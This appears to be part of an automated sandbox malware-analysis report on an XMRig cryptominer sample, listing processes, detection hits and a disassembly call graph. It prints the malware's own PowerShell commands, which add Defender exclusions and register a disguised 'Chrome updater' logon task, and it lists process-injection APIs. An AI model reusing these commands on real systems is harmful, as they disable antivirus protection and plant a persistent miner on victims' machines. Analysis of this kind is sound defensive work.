                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                          • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 55%, ReversingLabs
                                          Has exited:true

                                          Target ID:22
                                          Start time:18:27:02
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:24
                                          Start time:18:27:02
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:25
                                          Start time:18:27:02
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:26
                                          Start time:18:27:02
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:27
                                          Start time:18:27:03
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:28
                                          Start time:18:27:03
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:29
                                          Start time:18:27:04
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:30
                                          Start time:18:27:04
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\dialer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\dialer.exe
                                          Imagebase:0x7ff609870000
                                          File size:39'936 bytes
                                          MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:31
                                          Start time:18:27:04
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:32
                                          Start time:18:27:04
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:18:27:04
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:18:27:04
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:35
                                          Start time:18:27:05
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:36
                                          Start time:18:27:05
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:37
                                          Start time:18:27:06
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:38
                                          Start time:18:27:07
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:39
                                          Start time:18:27:07
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:41
                                          Start time:18:27:08
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:42
                                          Start time:18:27:08
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:43
                                          Start time:18:27:08
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:44
                                          Start time:18:27:09
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:45
                                          Start time:18:27:09
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\spoolsv.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\spoolsv.exe
                                          Imagebase:0x7ff646ff0000
                                          File size:842'752 bytes
                                          MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:46
                                          Start time:18:27:10
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:47
                                          Start time:18:27:12
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:48
                                          Start time:18:27:12
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:49
                                          Start time:18:27:12
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Reset < >
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1838713864.00007FF6A0401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A0400000, based on PE: true
                                            • Associated: 00000000.00000002.1838615697.00007FF6A0400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1838806707.00007FF6A041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1838933870.00007FF6A0440000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1840610451.00007FF6A09AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1840683106.00007FF6A09AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1840731510.00007FF6A09B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1840794472.00007FF6A09BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1840863354.00007FF6A09BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff6a0400000_ylVAEHbMLf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9cc93f7b19bfaeb148cae99ce2d9a2d98e1c8ad21f819d54012a117e1e035c07
                                            • Instruction ID: 9542ffae1e6ded45277a2934761bb24d69c07a23bf57dabbee99a8f4c2953ec9
                                            • Opcode Fuzzy Hash: 9cc93f7b19bfaeb148cae99ce2d9a2d98e1c8ad21f819d54012a117e1e035c07
                                            • Instruction Fuzzy Hash: 9EB0923091A20AA8E3042F0598412582620AB19780F805020DA0C56363CF6C50408710

                                            Execution Graph

                                            Execution Coverage:47.4%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:63.8%
                                            Total number of Nodes:232
                                            Total number of Limit Nodes:26
                                            execution_graph 557 7ff78ab326e8 558 7ff78ab328be 557->558 559 7ff78ab32716 557->559 562 7ff78ab32b0a ReadFile 558->562 563 7ff78ab328cc 558->563 560 7ff78ab3284a GetProcessHeap HeapAlloc K32EnumProcesses 559->560 561 7ff78ab3271c 559->561 564 7ff78ab32888 560->564 616 7ff78ab327b7 560->616 566 7ff78ab32729 561->566 567 7ff78ab32841 ExitProcess 561->567 565 7ff78ab32b34 562->565 562->616 568 7ff78ab32b00 563->568 569 7ff78ab328d5 563->569 575 7ff78ab310c0 30 API calls 564->575 564->616 576 7ff78ab319ac 3 API calls 565->576 565->616 570 7ff78ab32732 566->570 571 7ff78ab327e4 RegOpenKeyExW 566->571 574 7ff78ab31768 22 API calls 568->574 572 7ff78ab328e0 569->572 573 7ff78ab32aa5 569->573 588 7ff78ab3274f ReadFile 570->588 570->616 577 7ff78ab32811 RegDeleteValueW 571->577 578 7ff78ab32825 571->578 580 7ff78ab32921 572->580 581 7ff78ab328e5 572->581 579 7ff78ab31a44 ReadFile 573->579 574->616 575->564 583 7ff78ab32b53 576->583 577->578 627 7ff78ab31ac4 SysAllocString SysAllocString CoInitializeEx 578->627 585 7ff78ab32ab4 579->585 643 7ff78ab31a44 580->643 581->616 640 7ff78ab31958 581->640 591 7ff78ab32b67 GetProcessHeap HeapAlloc 583->591 592 7ff78ab327bc 583->592 583->616 595 7ff78ab31a44 ReadFile 585->595 585->616 587 7ff78ab3282a 635 7ff78ab31768 GetProcessHeap HeapAlloc 587->635 594 7ff78ab32779 588->594 588->616 590 7ff78ab32938 ReadFile 597 7ff78ab32960 590->597 590->616 598 7ff78ab314e4 13 API calls 591->598 603 7ff78ab32c18 4 API calls 592->603 605 7ff78ab319ac 3 API calls 594->605 594->616 600 7ff78ab32acb 595->600 602 7ff78ab3296d GetProcessHeap HeapAlloc ReadFile 597->602 597->616 615 7ff78ab32ba0 598->615 606 7ff78ab32ad3 ShellExecuteW 600->606 600->616 608 7ff78ab32a97 GetProcessHeap 602->608 609 7ff78ab329b1 602->609 603->616 612 7ff78ab32798 605->612 606->616 613 7ff78ab32bde HeapFree 608->613 609->608 618 7ff78ab329e2 609->618 619 7ff78ab32a05 lstrlenW GetProcessHeap HeapAlloc 609->619 610 7ff78ab32bd5 GetProcessHeap 610->613 612->592 612->616 617 7ff78ab327a8 612->617 613->616 615->610 667 7ff78ab316d8 615->667 620 7ff78ab310c0 30 API calls 617->620 618->608 647 7ff78ab31db4 618->647 624 7ff78ab32a49 619->624 620->616 661 7ff78ab32c18 CreateFileW 624->661 628 7ff78ab31c35 SysFreeString SysFreeString 627->628 629 7ff78ab31b16 CoInitializeSecurity 627->629 628->587 630 7ff78ab31b5e CoCreateInstance 629->630 631 7ff78ab31b52 629->631 632 7ff78ab31c2f CoUninitialize 630->632 633 7ff78ab31b92 VariantInit 630->633 631->630 631->632 632->628 634 7ff78ab31be8 633->634 634->632 636 7ff78ab314e4 13 API calls 635->636 638 7ff78ab317a6 636->638 637 7ff78ab317d4 GetProcessHeap HeapFree 638->637 639 7ff78ab316d8 5 API calls 638->639 639->638 641 7ff78ab31a14 2 API calls 640->641 642 7ff78ab3196d 641->642 644 7ff78ab31a68 ReadFile 643->644 645 7ff78ab31aa5 644->645 646 7ff78ab31a8b 644->646 645->590 645->616 646->644 646->645 657 7ff78ab31de0 647->657 648 7ff78ab31fb8 648->608 649 7ff78ab31e3e CreateProcessW 650 7ff78ab31e86 VirtualAllocEx 649->650 649->657 651 7ff78ab31eb9 WriteProcessMemory 650->651 650->657 651->657 652 7ff78ab31fc4 OpenProcess 653 7ff78ab31fd7 TerminateProcess 652->653 652->657 653->657 654 7ff78ab31f2a VirtualAlloc 656 7ff78ab31f49 GetThreadContext 654->656 654->657 655 7ff78ab31ee4 WriteProcessMemory 655->657 656->657 658 7ff78ab31f61 WriteProcessMemory 656->658 657->648 657->649 657->652 657->654 657->655 658->657 659 7ff78ab31f89 SetThreadContext 658->659 659->657 660 7ff78ab31fa9 ResumeThread 659->660 660->648 660->657 662 7ff78ab32a83 GetProcessHeap HeapFree 661->662 663 7ff78ab32c62 WriteFile 661->663 662->608 664 7ff78ab32c86 663->664 665 7ff78ab32ca4 CloseHandle 663->665 664->665 666 7ff78ab32c8a WriteFile 664->666 665->662 666->665 668 7ff78ab316f7 OpenProcess 667->668 669 7ff78ab31751 667->669 668->669 670 7ff78ab3170f 668->670 669->610 671 7ff78ab318f8 2 API calls 670->671 673 7ff78ab3172f 671->673 672 7ff78ab31748 CloseHandle 672->669 673->672 674 7ff78ab3173d CloseHandle 673->674 674->672 406 7ff78ab3228c 407 7ff78ab32299 406->407 409 7ff78ab322b9 ConnectNamedPipe 407->409 410 7ff78ab322ae Sleep 407->410 415 7ff78ab31c64 AllocateAndInitializeSid 407->415 411 7ff78ab322c8 ReadFile 409->411 412 7ff78ab322fd Sleep 409->412 410->407 413 7ff78ab32308 DisconnectNamedPipe 411->413 414 7ff78ab322eb 411->414 412->413 413->409 414->413 416 7ff78ab31d9c 415->416 417 7ff78ab31cc1 SetEntriesInAclW 415->417 416->407 417->416 419 7ff78ab31d1e LocalAlloc 417->419 419->416 420 7ff78ab31d32 InitializeSecurityDescriptor 419->420 420->416 421 7ff78ab31d44 SetSecurityDescriptorDacl 420->421 421->416 422 7ff78ab31d5c CreateNamedPipeW 421->422 422->416 423 7ff78ab32cc0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 424 7ff78ab32d16 K32EnumProcesses 423->424 425 7ff78ab32d76 Sleep 424->425 426 7ff78ab32d2b 424->426 425->424 427 7ff78ab32d64 426->427 429 7ff78ab326c8 426->429 427->425 430 7ff78ab326e0 429->430 431 7ff78ab326d5 429->431 430->426 433 7ff78ab310c0 431->433 471 7ff78ab319ac OpenProcess 433->471 436 7ff78ab314c5 436->430 437 7ff78ab31122 OpenProcess 437->436 438 7ff78ab3113e OpenProcess 437->438 439 7ff78ab31208 NtQueryInformationProcess 438->439 440 7ff78ab31161 K32GetModuleFileNameExW 438->440 443 7ff78ab314bc CloseHandle 439->443 444 7ff78ab3122f 439->444 441 7ff78ab311aa CloseHandle 440->441 442 7ff78ab3117a PathFindFileNameW lstrlenW 440->442 441->439 447 7ff78ab311b8 441->447 442->441 446 7ff78ab31197 StrCpyW 442->446 443->436 444->443 445 7ff78ab3123b OpenProcessToken 444->445 445->443 448 7ff78ab31259 GetTokenInformation 445->448 446->441 447->439 449 7ff78ab311e3 StrCmpIW 447->449 450 7ff78ab312fc 448->450 451 7ff78ab31281 GetLastError 448->451 449->443 449->447 453 7ff78ab31303 CloseHandle 450->453 451->450 452 7ff78ab3128c LocalAlloc 451->452 452->450 454 7ff78ab312a2 GetTokenInformation 452->454 453->443 458 7ff78ab31317 453->458 455 7ff78ab312ea 454->455 456 7ff78ab312ca GetSidSubAuthorityCount GetSidSubAuthority 454->456 457 7ff78ab312f1 LocalFree 455->457 456->457 457->453 458->443 459 7ff78ab313a6 StrStrA 458->459 460 7ff78ab313ce 458->460 459->458 461 7ff78ab313d3 459->461 460->443 461->443 462 7ff78ab313fe VirtualAllocEx 461->462 462->443 463 7ff78ab3142b WriteProcessMemory 462->463 463->443 464 7ff78ab31446 463->464 476 7ff78ab318f8 464->476 466 7ff78ab31466 466->443 467 7ff78ab31483 WaitForSingleObject 466->467 470 7ff78ab3147c CloseHandle 466->470 469 7ff78ab31492 GetExitCodeThread 467->469 467->470 469->470 470->443 472 7ff78ab319d8 IsWow64Process 471->472 473 7ff78ab3110e 471->473 474 7ff78ab319ea 472->474 475 7ff78ab319f8 CloseHandle 472->475 473->436 473->437 474->475 475->473 479 7ff78ab31a14 GetModuleHandleA 476->479 480 7ff78ab31914 479->480 481 7ff78ab31a34 GetProcAddress 479->481 481->480 482 7ff78ab32d84 483 7ff78ab32d91 482->483 484 7ff78ab31c64 6 API calls 483->484 485 7ff78ab32db1 ConnectNamedPipe 483->485 486 7ff78ab32da6 Sleep 483->486 484->483 487 7ff78ab32e0f Sleep 485->487 488 7ff78ab32dc0 ReadFile 485->488 486->483 489 7ff78ab32e1a DisconnectNamedPipe 487->489 488->489 490 7ff78ab32de3 488->490 489->485 493 7ff78ab326ac 490->493 494 7ff78ab326b9 493->494 495 7ff78ab326c1 WriteFile 493->495 496 7ff78ab310c0 30 API calls 494->496 495->489 496->495 497 7ff78ab32314 500 7ff78ab32328 497->500 525 7ff78ab32078 500->525 504 7ff78ab32078 14 API calls 505 7ff78ab323de GetCurrentProcessId OpenProcess 504->505 506 7ff78ab32400 OpenProcessToken 505->506 507 7ff78ab32486 FindResourceExA 505->507 508 7ff78ab32419 LookupPrivilegeValueW 506->508 509 7ff78ab3247d CloseHandle 506->509 510 7ff78ab3231d ExitProcess 507->510 511 7ff78ab324a6 SizeofResource 507->511 508->509 512 7ff78ab32433 AdjustTokenPrivileges 508->512 509->507 511->510 513 7ff78ab324bf LoadResource 511->513 512->509 514 7ff78ab32477 GetLastError 512->514 513->510 515 7ff78ab324d3 LockResource GetCurrentProcessId 513->515 514->509 542 7ff78ab317f8 GetProcessHeap HeapAlloc 515->542 517 7ff78ab324f0 RegCreateKeyExW 518 7ff78ab3260d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 517->518 519 7ff78ab32532 ConvertStringSecurityDescriptorToSecurityDescriptorW 517->519 520 7ff78ab32693 SleepEx 518->520 521 7ff78ab32587 RegCreateKeyExW 519->521 522 7ff78ab32566 RegSetKeySecurity LocalFree 519->522 520->520 523 7ff78ab32602 RegCloseKey 521->523 524 7ff78ab325c3 GetCurrentProcessId RegSetValueExW RegCloseKey 521->524 522->521 523->518 524->523 526 7ff78ab32270 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 525->526 527 7ff78ab32081 StrCpyW StrCatW GetModuleHandleW 525->527 526->504 527->526 528 7ff78ab320d3 527->528 528->528 529 7ff78ab3210c GetCurrentProcess K32GetModuleInformation 528->529 530 7ff78ab32267 FreeLibrary 529->530 531 7ff78ab3212e CreateFileW 529->531 530->526 531->530 532 7ff78ab32163 CreateFileMappingW 531->532 533 7ff78ab3218d MapViewOfFile 532->533 534 7ff78ab3225e CloseHandle 532->534 535 7ff78ab321b1 533->535 536 7ff78ab32255 CloseHandle 533->536 534->530 535->536 537 7ff78ab321cc lstrcmpiA 535->537 539 7ff78ab321fd 535->539 536->534 537->535 538 7ff78ab321ff VirtualProtect 537->538 548 7ff78ab318b8 538->548 539->536 541 7ff78ab3223a VirtualProtect 541->536 550 7ff78ab314e4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 542->550 544 7ff78ab31891 GetProcessHeap HeapFree 545 7ff78ab3183c 545->544 546 7ff78ab3185d OpenProcess 545->546 546->545 547 7ff78ab31873 TerminateProcess CloseHandle 546->547 547->545 549 7ff78ab318c7 548->549 549->541 549->549 551 7ff78ab3163b GetProcessHeap HeapFree GetProcessHeap HeapFree 550->551 556 7ff78ab31571 550->556 551->545 552 7ff78ab31586 OpenProcess 553 7ff78ab315a3 K32EnumProcessModules 552->553 552->556 554 7ff78ab31626 CloseHandle 553->554 553->556 554->556 555 7ff78ab315d5 ReadProcessMemory 555->556 556->551 556->552 556->554 556->555

                                            Callgraph

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                            • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                            • API String ID: 2439791646-1130149537
                                            • Opcode ID: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
                                            • Instruction ID: 1df696b3b34a9ce3d77e5e0a65a388fd9d20d85979bdded3b7b13f6aef5e7a50
                                            • Opcode Fuzzy Hash: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
                                            • Instruction Fuzzy Hash: FFA12A35E0AB82A6F720AF61E8443AABBE1FB84754FA04179DA4D47B64DF3CD148C710

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
